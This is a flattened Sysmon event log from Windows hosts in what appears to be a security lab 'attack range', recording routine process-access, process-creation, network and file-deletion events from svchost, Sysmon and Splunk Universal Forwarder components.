11:26:47.167{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223112Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.167{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223111Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.167{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223110Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.167{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223109Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.167{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223108Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.167{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223107Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.167{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223106Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.167{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223105Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.167{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-19F7-6216-5805-000000003902}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223104Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.167{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19F7-6216-5805-000000003902}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223103Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:47.168{4F8D34B0-19F7-6216-5805-000000003902}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000223123Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223122Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223121Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.995{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19F8-6216-5905-000000003902}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223120Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:48.996{4F8D34B0-19F8-6216-5905-000000003902}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:48.111{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D50C033F022C8317BAADEC7891B1D87,SHA256=3562A5AF9FDE3DB8210E6C979009432170D61E965FCF138337EC68D7D13F63EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223119Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:46.219{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51763-false10.0.1.12-8089- 10341000x8000000000000000223148Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.683{4F8D34B0-19F9-6216-5A05-000000003902}36723740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223147Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.495{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-19F9-6216-5A05-000000003902}3672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:49.126{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C8F5E973A3B85C8CFD0926F454223CA,SHA256=2F9F769CD4B3806C45A403E60CCB2DBACEF1296369548E3F7CA6B14AAFD88DD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223146Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.495{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223145Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.495{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223144Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.495{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223143Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.495{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223142Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.495{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223141Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.495{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223140Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:49.495{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223139Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 